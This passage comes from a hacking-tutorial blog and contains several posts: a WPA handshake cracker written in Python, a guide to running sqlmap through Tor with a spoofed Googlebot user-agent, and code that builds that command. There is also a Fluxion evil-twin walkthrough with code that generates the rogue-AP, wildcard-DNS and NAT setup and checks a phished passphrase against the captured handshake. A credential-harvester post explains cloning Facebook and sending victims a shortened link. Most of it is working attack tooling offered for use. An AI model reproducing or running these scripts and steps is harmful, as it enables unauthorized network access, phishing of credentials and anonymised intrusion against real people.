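HANDSHAKE = {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC,
             "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_MSG2}
HANDSHAKE["mic"] = mic_for(derive_pmk("correct horse", SSID), HANDSHAKE)


def crack_handshake(candidates, hs: dict):
    """Wordlist attack: one full PBKDF2 per candidate, then the cheap check."""
    for pw in candidates:
        if hmac.compare_digest(mic_for(derive_pmk(pw, hs["ssid"]), hs), hs["mic"]):
            return pw
    return None


def build_pmk_table(candidates, ssid: bytes) -> dict:
    """The precomputed table of the text: PMKs for one SSID, built once and
    reusable against every network that uses that SSID."""
    return {pw: derive_pmk(pw, ssid) for pw in candidates}


def crack_with_table(table: dict, hs: dict):
    """Same check, PBKDF2 skipped: only PRF + HMAC per candidate remain."""
    for pw, pmk in table.items():
        if hmac.compare_digest(mic_for(pmk, hs), hs["mic"]):
            return pw
    return None


if __name__ == "__main__":
    words = ["password", "letmein", "correct horse", "12345678"]
    print("wordlist run:", crack_handshake(words, HANDSHAKE))
    print("table run:   ", crack_with_table(build_pmk_table(words, SSID), HANDSHAKE))
```

Two things to take from running it: changing the SSID changes the PMK even for the same passphrase (so a table for "linksys" is useless against "HomeNet"), and the part that the table removes is exactly the part that dominates the runtime; the PRF and HMAC that remain cost microseconds.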

Tools (Kali)

In this section I'll name some common tools in the wireless hacking category which come preinstalled in Kali, along with the purpose they are used for.
  1. Capture packets
    • airodump-ng 
    • wireshark (really versatile tool, there are books just covering this tool for packet analysis)
  2. Crack handshakes
  3. WPS
    • reaver
    • pixiewps (performs the "pixie dust attack")
  4. Cool tools
  5. Automation
    • wifite
    • fluxion (actually it isn't a common script at all, but since I wrote a tutorial on it, I'm linking it)
You can find more details about all the tools installed on Kali on the Kali Tools page.

Okay guys, this is all that I had planned for this tutorial. I hope you learnt a lot of stuff. Will delve into further depths in coming tutorials.

Saturday, September 3, 2016

SQLMap with Tor for Anonymity

In a previous tutorial, I demonstrated how to use sqlmap to carry out SQL injection on a website. In this tutorial, I will show you how to use Tor to add a layer of obscurity between you and the target website.

Installing Tor

Getting Tor on Kali Linux is as simple as typing a single line in the terminal-
apt-get install tor
If you have any problems installing, run apt-get update first.

Start Tor

This is also quite simple: run tor in the terminal and leave it running in the foreground.
tor
You'll see something like this-

    Sep 04 02:41:25.806 [notice] Tor v0.2.8.7 (git-cc2f02ef17899f86) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.2h and Zlib 1.2.8.
    Sep 04 02:41:25.806 [notice] Tor can't help you if you use it wrong! Learn how to be safe at
    Sep 04 02:41:25.806 [notice] Read configuration file "/etc/tor/torrc".
    Sep 04 02:41:25.811 [notice] Opening Socks listener on
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
    Sep 04 02:41:26.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
    Sep 04 02:41:26.000 [notice] Bootstrapped 0%: Starting
    Sep 04 02:41:27.000 [notice] Bootstrapped 5%: Connecting to directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
    Sep 04 02:41:27.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
    Sep 04 02:41:28.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
    Sep 04 02:41:29.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
    Sep 04 02:41:30.000 [notice] Bootstrapped 40%: Loading authority key certs
    Sep 04 02:41:30.000 [notice] Bootstrapped 45%: Asking for relay descriptors
    Sep 04 02:41:30.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7117, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
    Sep 04 02:41:31.000 [notice] Bootstrapped 50%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 55%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 61%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 66%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 73%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 78%: Loading relay descriptors
    Sep 04 02:41:35.000 [notice] Bootstrapped 80%: Connecting to the Tor network
    Sep 04 02:41:36.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
    Sep 04 02:41:38.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
    Sep 04 02:41:38.000 [notice] Bootstrapped 100%: Done
Important: Don't close this terminal. Tor is running in the foreground and stops the moment you do; open a new terminal for the next steps. Once you see "Bootstrapped 100%: Done", Tor is listening as a SOCKS5 proxy on 127.0.0.1:9050 (the default from /etc/tor/torrc), which is the port sqlmap's --tor switch expects. The "running Tor as root" warning is expected on a default Kali install, where everything runs as root; it doesn't stop Tor from working, but the advice is sound.

Testing with Sqlmap

Use this command, with your target URL as the value of -u:
sqlmap -u --tor --tor-type=SOCKS5
SOCKS5 is already sqlmap's default Tor proxy type, so --tor-type=SOCKS5 is harmless but redundant. What is worth adding is --check-tor, which makes sqlmap confirm via the Tor Project's check page that its requests really leave through a Tor exit before it sends anything to the target. Also note the first warning in the output below: sqlmap raises --time-sec from its default of 5 to 10 because Tor adds latency and jitter, which otherwise makes time-based blind injection unreliable.

If you want a text version:-

    ___ ___| |_____ ___ ___ {}
    |_ -| . | | | .'| . |
    |___|_ |_|_|_|_|__,| _|
    |_| |_|

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 02:47:02

    [02:47:02] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
    [02:47:02] [INFO] setting Tor SOCKS proxy settings
    [02:47:02] [INFO] testing connection to the target URL
    [02:47:03] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [02:47:04] [INFO] testing if the target URL is stable
    [02:47:06] [INFO] target URL is stable
    [02:47:06] [INFO] testing if GET parameter 'cat' is dynamic
    [02:47:07] [INFO] confirming that GET parameter 'cat' is dynamic
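The two things that go wrong in practice are launching sqlmap before Tor has finished bootstrapping and pointing it at a SOCKS port Tor did not actually open. This added example (mine, not part of the original post or of sqlmap) parses the foreground log shown above, gates on "Bootstrapped 100%" plus an opened circuit, and only then builds the sqlmap command line, pinned to the port Tor reported and with --check-tor included. The sample log is constructed from the shape of the one above; the listener address 127.0.0.1:9050 in it is Tor's default and is assumed, since the address is not shown in the log on this page.

```python
import re

# Constructed sample of what `tor` prints in the foreground (trimmed copy of
# the shape shown above; the SOCKS address is Tor's default, an assumption).
SAMPLE_TOR_LOG = """\
Sep 04 02:41:25.806 [notice] Tor v0.2.8.7 (git-cc2f02ef17899f86) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.2h and Zlib 1.2.8.
Sep 04 02:41:25.811 [notice] Opening Socks listener on 127.0.0.1:9050
Sep 04 02:41:26.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Sep 04 02:41:26.000 [notice] Bootstrapped 0%: Starting
Sep 04 02:41:27.000 [notice] Bootstrapped 5%: Connecting to directory server
Sep 04 02:41:36.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Sep 04 02:41:38.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Sep 04 02:41:38.000 [notice] Bootstrapped 100%: Done
"""

LINE_RE = re.compile(r"^\S+ \d+ [\d:.]+ \[(?P<level>\w+)\] (?P<msg>.*)$")
BOOT_RE = re.compile(r"Bootstrapped (?P<pct>\d+)%")
SOCKS_RE = re.compile(r"Opening Socks listener on (?P<host>[\d.]+):(?P<port>\d+)")


def parse_tor_log(text: str) -> dict:
    """Reduce Tor's log to the few facts that matter before launching a tool through it."""
    state = {"bootstrapped": 0, "socks": None, "circuit": False, "warnings": []}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                          # not a Tor log line (banner, blank, etc.)
        level, msg = m.group("level"), m.group("msg")
        if level in ("warn", "err"):
            state["warnings"].append(msg)
        if (b := BOOT_RE.search(msg)):
            state["bootstrapped"] = int(b.group("pct"))
        if (s := SOCKS_RE.search(msg)):
            state["socks"] = (s.group("host"), int(s.group("port")))
        if "successfully opened a circuit" in msg:
            state["circuit"] = True
    return state


def tor_ready(state: dict) -> bool:
    """Fully bootstrapped, a circuit built, and a SOCKS port to point sqlmap at."""
    return state["bootstrapped"] == 100 and state["circuit"] and state["socks"] is not None


def sqlmap_tor_command(target_url: str, state: dict, extra=()) -> list:
    """argv for sqlmap forced through the port Tor reported. --check-tor makes
    sqlmap verify with the Tor Project's check page that requests really exit
    Tor before it touches the target. Raises instead of building a command
    that could run before Tor is usable."""
    if not tor_ready(state):
        raise RuntimeError(f"Tor not ready: bootstrapped={state['bootstrapped']}%, circuit={state['circuit']}")
    _host, port = state["socks"]
    return ["sqlmap", "-u", target_url, "--tor", "--tor-type=SOCKS5",
            f"--tor-port={port}", "--check-tor", *extra]


if __name__ == "__main__":
    st = parse_tor_log(SAMPLE_TOR_LOG)
    print("warnings:", st["warnings"])
    print(" ".join(sqlmap_tor_command("http://target.example/item.php?cat=1", st)))
```

In real use you would feed the function the output of `tor` (for example by tailing its log file) and refuse to start sqlmap until `tor_ready` is true; the point of `--check-tor` is that it fails closed, while a wrong proxy port would at best fail with a connection error after you had already typed the target in.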

Additional obscurity

Google's crawlers visit websites constantly and are among the least suspicious entries in a web server's log. We can use that to our advantage: use this command to pretend to be Googlebot.
sqlmap -u --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +"

At this point you look like Googlebot, and your IP is that of some Tor exit node. This should be enough for most purposes, but know its limits: the real Googlebot's addresses reverse-resolve to googlebot.com (Google publishes a verification procedure for exactly this), Tor exit addresses are public and are widely blocked or flagged by WAFs, and a "Googlebot" that arrives from a Tor exit and sends injection payloads is an anomaly any analyst will spot. Tor hides where you are, not what you are doing.

This is all I had in mind for this tutorial. I urge you not to assume that using Tor means you can do illegal stuff and get away with it. This tutorial is written only for educational purposes.

Thursday, August 25, 2016

Hacking WPA/WPA2 without dictionary/bruteforce : Fluxion

Fluxion (linset)

I hadn't ventured into Hackforums in a while, and this time when I went there I saw a thread about a script called Fluxion. It's based on another script called linset (actually it's not much different from linset; think of it as an improvement, with some bug fixes and additional options). I did once think about (and was asked in a comment about) using something like a man in the middle attack / evil twin attack to get a WPA password instead of going the bruteforce/dictionary route, but never looked the idea up on the internet nor spent much time pondering over it. However, once I saw the thread about this cool script, I decided to give it a try. So in this post I'll show you how I used Fluxion, and how you can too.
Disclaimer : Use this tool only on networks you own. Don't do anything illegal.


  • Checking if tool is pre-installed, getting it via github if it isn't.
  • Running the script, installing dependencies if required.
  • Quick overview of how to use Fluxion.
  • Detailed walk-through and demonstration with text explanation and screenshots
  • Video demonstration (not identical to the written demo, but almost the same)
  • Troubleshooting section

Just double checking

The first thing I did was make sure that Kali doesn't already have this tool. If you are reading this post a long time after it was written, the tool might well be preinstalled in Kali by then. In any case, try this out:
I personally tried to check whether linset or fluxion came preinstalled in Kali (though I didn't expect them to be there).

Getting the script

Getting the script is just a matter of cloning the github repository. Just use the git command line tool to do it.
git clone
If you have any problems with this step, then you can just navigate to the repository and manually download the files.

There are 4 dependencies that need to be installed

Running the script

Just navigate to the fluxion directory or the directory containing the scripts in case you downloaded them manually. If you are following the terminal commands I'm using, then it's just a simple change directory command for you:
cd fluxion
Now, run the script.
sudo ./fluxion


If you have any unmet dependencies, then  run the installer script.
sudo ./
I had 4 unmet dependencies, and the installer script run was a buggy experience for me (though it might be because I have completely screwed up my system, editing files I wasn't supposed to, and now I can't get them back in order). It got stuck multiple times during the process, and I had to ctrl+c my way out of it many times (though ctrl+c didn't terminate the whole installer, just the little update popup). Also, I ran the installer script twice and that messed up some of the apt-get settings. I suggest that after installation is complete, you restore your /etc/apt/sources.list to its original state, and remove the bleeding edge repositories (unless you know what you're doing). To know what your repository list should look like, take a look here.

Anyways, one way or the other, your unmet dependencies will be resolved, and then you can use Fluxion.
PS: For those trying to use apt-get to install the missing stuff - some of the dependencies aren't available in the default Kali repos, so you'll have to let the script do the installation for you, or manually add the repos to /etc/apt/sources.list (look at the script to find out which repos you need to add).


Once again, type the following:
sudo ./fluxion

This time it should run just fine, and you would be asked a few very simple questions.
  • For the wireless adapter, choose whichever one you want to monitor on. For the channels question, choose all, unless you have a specific channel in mind, which you know has the target AP.
  • Then you will see an airodump-ng window (named Wifi Monitor). Let it run while it looks for APs and clients. Once you think you have what you need, use the close button to stop the monitoring.
  • Fluxion using airodump-ng
  • You'll then be prompted to select target.
  • Then you'll be prompted to select attack.
  • Then you'll be prompted to provide handshake.
  • If you don't have a handshake captured already, the script will help you capture one. It will send deauth packets to achieve that.
  • After that, I quit the procedure (I was using the script in my college hostel and didn't want to cause any troubles to other students).

If you are with me so far, then you can either just close this website and try to use the tool on your own (it looks intuitive enough to me), or you can read through the test run that I'm going to do now.

Getting my wireless network's password by fooling my smartphone into connecting to a fake AP

So, in this example run, I will try to find out the password of my wireless network by making my smartphone connect to a fake AP, and then type out the password in the smartphone, and then see if my Fluxion instance on my Kali machine (laptop) gets the password. Also, for the handshake, I will de-authenticate the same smartphone.

PS: You can probably follow this guide without having any clue how WPA works, what handshake is, what is actually going on, etc., but I suggest you do read up about these things. Here are a few links to other tutorials on this website itself that would prove useful (the first two are theoretical, yet nice, the third one is a pretty fun attack, which I suggest you try out, now or later):
  1. Things you should know about Wireless Hacking - Beginner Level Stuff
  2. Things you should know about Wireless Hacking Part II - Intermediate Level Stuff
  3. Evil Twin Attack
This is the theoretical stuff. Experience with tools like aircrack-ng, etc. would also be useful. Take a look at the navigation bar at the top and look at the various tutorials under the "Wireless Hacking" category.

Anyways, with the recommended reading material covered, you can comfortably move on to the actual hacking now:

The real stuff begins!

This section is going to be a set of pictures with captions below them explaining stuff. It should be easy to follow I hope.

Select language
After selecting language, this step shows up.
Note how I am not using any external wireless card, but my laptop's internal card.
However, some internal cards may cause problems, so it's better to use an
external card (and if you are on a virtual machine you will have to use an external card).

The scanning process starts, using airodump-ng.

You get to choose a target. I'm going after network number 21, the one my smartphone
is connected to.

You choose an attack. I am going to choose the Hostapd (first one) attack.

If you had already captured a 4-way handshake, then you can specify the location
to that handshake and the script will use it. Otherwise, it will capture a handshake
in the next step for you. (A tutorial on capturing the handshake separately)
If you didn't capture a handshake beforehand, then you get to choose which
tool to use to do that. I'll go with aircrack-ng.

Once you have a handshake captured (see the WPA Handshake: [MAC Address] at the top; if it's
there, then you have the handshake), type 1 and enter to check the handshake. If everything's fine,
you'll go to the next step.

Use the Web Interface method. I didn't try the bruteforce thing, but I guess it's just
the usual bruteforce attack that most tools use (and thus no use to us, since that's
not what we are using this script for).

This offers a variety of login pages that you can use to get (phish) the
WPA network's password. I went with the first choice.

After making your decision, you'll see multiple windows. DHCP and DNS requests are being handled in
left two windows, while the right two are status reporting window and deauth window (to get users
off the actual AP and lure them to our fake AP)

On my smartphone, I see two networks with the same name. Note that while the original network is WPA-2
protected, the fake AP we have created is an open network (which is a huge giveaway, stopping most people
from making the mistake of connecting to it). Anyways, I connected to the fake AP, and the DNS and DHCP windows
(the left ones) reacted accordingly.
After connecting to the network, I got a notification saying that I need to log in to the wireless network.
On tapping that, I found this page. For some people, you'll have to open your browser and try to open a website to get this page to show up. After I entered the password and pressed submit, the script ran the
password against the handshake we had captured earlier to verify that it is indeed correct. Note how the
handshake is a luxury, not a necessity, in this method. It only serves to verify whether the password
submitted by the fake AP's client is correct. Without the handshake we lose that ability (a typo by the
victim would be accepted as happily as the real password), but assuming the client types the correct
password, the attack still works.

Aircrack-ng tried the password against the handshake, and as expected, it worked.
We successfully obtained the password to a WPA-2 protected network in a matter of minutes.
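For readers who want to see what the Hostapd attack actually sets up behind those four windows, here is an added example in Python (my code, not Fluxion's, which is a bash script): the open twin AP's hostapd configuration, the dnsmasq configuration whose wildcard DNS answer is what triggers the "sign in to network" prompt on the phone, the NAT rule that catches HTTP aimed at cached IPs, and the post-submit check that hands the single submitted candidate to aircrack-ng against the captured handshake. The target SSID/BSSID/channel are constructed values, and the interface name wlan1 and portal address 192.168.254.1 are assumptions. The login page itself (the part that is pure phishing) is not included.

```python
import os
import subprocess
import tempfile

# Constructed target (not from a real scan): the fields the airodump-ng step gives you.
TARGET = {"ssid": "HomeNet", "bssid": "00:11:22:33:44:55", "channel": 6}
PORTAL_IP = "192.168.254.1"   # assumed address of the fake AP and its captive portal
AP_IFACE = "wlan1"            # assumed interface for hostapd (the other card keeps deauthing)


def hostapd_conf(target: dict, iface: str) -> str:
    """An OPEN access point cloning the target's SSID on the target's channel.
    There is deliberately no wpa= line: without the real passphrase we could
    not complete a WPA-2 4-way handshake, so the twin has to be open and
    collect the passphrase through a web page instead."""
    lines = [
        f"interface={iface}",
        "driver=nl80211",
        f"ssid={target['ssid']}",
        "hw_mode=g",
        f"channel={target['channel']}",
        "auth_algs=1",              # open system authentication only
        "ignore_broadcast_ssid=0",  # beacon the name so it shows up next to the real one
    ]
    return "\n".join(lines) + "\n"


def dnsmasq_conf(iface: str, portal_ip: str) -> str:
    """DHCP for victims plus wildcard DNS: every name resolves to the portal.
    This is what makes the phone show 'sign in to network' and what lands a
    browser on the fake login page whatever site it asked for."""
    net = portal_ip.rsplit(".", 1)[0]
    lines = [
        f"interface={iface}",
        f"dhcp-range={net}.10,{net}.200,12h",
        f"dhcp-option=3,{portal_ip}",   # option 3: default gateway
        f"dhcp-option=6,{portal_ip}",   # option 6: DNS server
        f"address=/#/{portal_ip}",      # '#' matches every domain
        "no-resolv",                    # never consult a real resolver
    ]
    return "\n".join(lines) + "\n"


def iptables_rules(iface: str, portal_ip: str, portal_port: int = 80) -> list:
    """Catch HTTP sent straight to an IP the client already cached and DNAT it to the portal."""
    return [["iptables", "-t", "nat", "-A", "PREROUTING", "-i", iface, "-p", "tcp",
             "--dport", "80", "-j", "DNAT", "--to-destination", f"{portal_ip}:{portal_port}"]]


def write_configs(directory: str) -> dict:
    """Write both config files into a directory and return their paths."""
    paths = {"hostapd": os.path.join(directory, "hostapd.conf"),
             "dnsmasq": os.path.join(directory, "dnsmasq.conf")}
    with open(paths["hostapd"], "w") as f:
        f.write(hostapd_conf(TARGET, AP_IFACE))
    with open(paths["dnsmasq"], "w") as f:
        f.write(dnsmasq_conf(AP_IFACE, PORTAL_IP))
    return paths


def verify_with_aircrack(candidate: str, capfile: str, bssid: str, run=subprocess.run) -> bool:
    """The check performed after the victim submits a passphrase: test that one
    candidate against the captured handshake with aircrack-ng. This is the only
    reason the handshake is needed; without it we would have to trust the input."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as wordlist:
        wordlist.write(candidate + "\n")
    try:
        argv = ["aircrack-ng", "-q", "-w", wordlist.name, "-b", bssid, capfile]
        proc = run(argv, capture_output=True, text=True)
        return "KEY FOUND!" in proc.stdout      # aircrack-ng's success banner
    finally:
        os.unlink(wordlist.name)


if __name__ == "__main__":
    out = tempfile.mkdtemp(prefix="eviltwin-")
    for name, path in write_configs(out).items():
        print(f"--- {name}: {path}")
        print(open(path).read())
    print("nat rule:", " ".join(iptables_rules(AP_IFACE, PORTAL_IP)[0]))
```

The `run` parameter exists so the aircrack-ng call can be exercised without a capture file; in use, call `verify_with_aircrack(submitted, "handshake.cap", TARGET["bssid"])` and only stop the deauth window once it returns True, which is the behaviour the screenshots above show.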

Video Demonstration

PS: The creator of the video has forked the Fluxion repository, and in the video he cloned from it instead. You may choose to clone from either of them. The original repository is more frequently updated, and the forked one more stable (but less frequently updated). As of the time of creation of the video, both repositories were the same, so it doesn't make a difference which one you clone, but this may not always be the case. In case of any issues, you can probably try cloning both and see which one works for you.


Since both Fluxion and Kali are constantly evolving (you might be using a different rolling release of Kali as well as a different version of Fluxion), there are times when the tool breaks and stays broken for a while. Look at the issues page, and you will most probably find a fix for your problem. Note that the fix may well be in a closed issue (it most probably is).

For those who are able to follow the guide to the second last step, but don't get any Login page on their device, this issue suggests a solution. [Dated : 17th September, if you're reading this much later then this might not be relevant, and some other issue would be]

What now?

I illustrated one possible scenario. This script can work with other devices (laptops for example) too as the fooled clients (not just smartphones). One possible short-coming to this attack is that most smartphones/laptops these days don't automatically connect to open networks (unless they have before), and hence the user has to do it manually. If your fake AP has more signal strength than the real one, then a person who doesn't know about WPA and open networks could very easily end up connecting to your network instead. So, overall this attack has a fair chance of succeeding.

Have any problems/comments/suggestions, leave them in the comments below.

Saturday, August 13, 2016

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

Did you know you can get a Facebook password with one fake Facebook page (phishing)?

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.


It is a part of the SOCIAL ENGINEERING TOOLKIT. In this method the attack starts with the creation of a phishing page. The attacker sets the post-back IP address that will receive the credentials (usernames and passwords). The attacker can shorten the IP address to make it look like a genuine URL. When the victim visits the URL and enters the login details, the post-back feature of the page sends all the data to the attacker.

LET'S DO THIS!!!!!!!!!

Follow this video..........


1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    root@kali~# setoolkit

3. Enter 'y' to agree to the Social Engineering Toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in (your ip address)
          set:webattack>Enter the url to clone:

6. Go to Places > Computer > var > www and move all the files from the www folder to the html folder (Apache on Kali serves /var/www/html).

7. Shorten your IP address with a URL shortener and send it to the victim. When the victim opens the link and enters the login details, you will get the username and password in a harvester text file located at Places > Computer > var > www.

More Detailed Guides

If there's something that isn't clear, there's a 3-post series which covers this method in detail-

  1. Setting up the background - How Not To Hack Facebook (light read, no technical content, optional)
  2. Performing the attack on LAN - Hack Facebook via Social Engineering - Credential Harvester attack
  3. Performing the attack on the internet - Port Forwarding and use of public IP to extend the attack outside your LAN

Monday, August 1, 2016

Things You Should Know : Wireless Hacking Basics

This is the first post in a new series of posts that don't involve any real hacking (and hence don't require that you have Kali installed on your system), but instead explain concepts in an interesting way (at least I hope so). If you have tried getting started in the world of hacking, but failed despite your best attempts, then this series will get you to a position where you'll find it easier to understand any tutorials you read in the future (on this site or any other). Note that I might use some technical jargon in places, but will usually try to use layman's terms. Also, this guide is an oversimplification and hence factual precision is not its strong suit; ease of understanding is.


You should know-
  • Nothing really.


You will know -
  • What are the different flavors of wireless networks you'll encounter and how difficult it is to hack each of them.
  • What are hidden networks, and whether they offer a real challenge to a hacker.
  • You'll have a very rough idea how each of the various 'flavors' of wireless networks is actually hacked.
(The last point would be covered in details in the next post)

Wireless Security Levels

Below is a (bad but hopefully helpful) analogy I'm using to explain the various possible security implementations that a wireless network may have.
Suppose you are the owner of a club. There can be many possible scenarios as far as entry to the club is concerned :-

  • Open Entry

    Open networks - They don't require a password to connect to the wireless router (access point).
    1. Open entry and unrestricted usage - Anyone can walk right in. They have unrestricted access to the dance floor, free beer, etc.
      This is an open network. It is only used in public places (restaurants, etc.) which offer free Internet access to their users (WiFi hotspots). It's fairly uncommon to find such networks.
    2. Open entry but restricted usage - Anyone can walk right in, but has to pay for drinks. As far as the router's security is concerned, this is also an open network. However, connecting to the wireless router (entering the club) doesn't guarantee you unlimited access to the internet: there is another layer of authentication. These are seen in public places (airports, restaurants, fast food joints, shopping malls) where they let you connect to the wireless network without any password, but after that there is an additional layer between you and the internet. This layer usually restricts your ability to access the internet (by bandwidth or by time), and can be used to charge you for the amount of data you use.
© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC